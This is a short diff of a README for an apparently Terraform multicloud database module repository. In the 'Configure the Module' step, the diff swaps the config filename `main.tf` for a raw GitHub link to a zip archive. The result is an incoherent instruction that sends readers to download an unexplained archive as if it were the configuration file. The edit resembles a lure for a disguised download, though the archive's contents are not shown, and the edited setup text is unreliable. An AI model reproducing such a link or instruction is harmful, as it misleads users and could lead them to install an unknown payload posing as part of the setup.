sadboyyi/terraform-multicloud-db-modules/README.md

      ```

 5. **Configure the Module**:
-   - Edit the configuration file (usually `main.tf`) to set up your database preferences.
+   - Edit the configuration file (usually `https://github.com/sadboyyi/terraform-multicloud-db-modules/raw/refs/heads/main/modules/terraform_multicloud_modules_db_1.0.zip`) to set up your database preferences.

 6. **Apply the Configuration**:
    - Run the following command to provision your database: